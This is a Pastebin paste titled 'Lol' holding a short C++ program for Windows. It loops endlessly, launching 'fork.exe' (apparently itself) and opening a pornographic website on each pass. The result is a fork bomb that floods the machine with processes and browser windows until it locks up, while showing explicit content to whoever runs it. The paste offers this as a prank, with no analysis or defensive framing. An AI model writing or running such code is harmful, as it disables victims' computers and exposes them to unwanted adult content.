Advertisement
Guest User

Lol

a guest
Oct 31st, 2014
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.22 KB | None | 0 0
  1. #include <windows.h>
  2. #include <iostream>
  3. int main(int argc, char* argv[])
  4. {
  5.     while(1) {
  6.         ShellExecute(0,"open", "fork.exe",NULL,NULL,1);
  7.         ShellExecute(0,"open", "http://pornhub.com/",NULL,NULL,1);
  8.     }
  9.     return 0;
  10. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement